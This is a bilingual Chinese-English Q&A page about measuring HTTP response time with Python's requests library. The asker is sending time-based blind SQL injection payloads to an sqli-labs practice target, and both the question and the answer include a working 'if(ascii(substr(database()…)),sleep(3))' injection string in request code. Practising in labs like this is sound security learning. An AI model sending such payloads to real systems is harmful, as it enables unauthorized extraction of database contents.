使用 Python 中的请求库测量 HTTP 响应时间.我做得对吗? [英] Measuring the HTTP response time with requests library in Python. Am I doing it right?

问题描述

我试图在来自 Web 应用程序的 HTTP 响应中引起人为延迟(这是一种用于执行盲 SQL 注入的技术).如果以下 HTTP 请求是从浏览器发送的，Web 服务器的响应将在 3 秒后返回(由 sleep(3) 引起):

I am trying to induce an artificial delay in the HTTP response from a web application (This is a technique used to do blind SQL Injections). If the below HTTP request is sent from a browser, response from the web server comes back after 3 seconds(caused by sleep(3)):

http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+

我正在尝试使用 requests 库在 Python 2.7 中执行相同的操作.我的代码是:

I am trying to do the same in Python 2.7 using the requests library. The code I have is:

import requests

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip

我预计往返时间为 3 秒，但我得到的值为 0.001371、0.001616、0.002228 等.我是否没有正确使用 elapsed 属性?

I expected the roundtrip to be 3 seconds, but instead I get values 0.001371, 0.001616, 0.002228, etc. Am I not using the elapsed attribute properly?

推荐答案

elapsed 测量从发送请求到完成解析响应headers 之间的时间，而不是直到传输完整响应.

elapsed measures the time between sending the request and finishing parsing the response headers, not until the full response has been transfered.

如果你想测量那个时间，你需要自己测量:

If you want to measure that time, you need to measure it yourself:

import requests
import time

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip

这篇关于使用 Python 中的请求库测量 HTTP 响应时间.我做得对吗?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！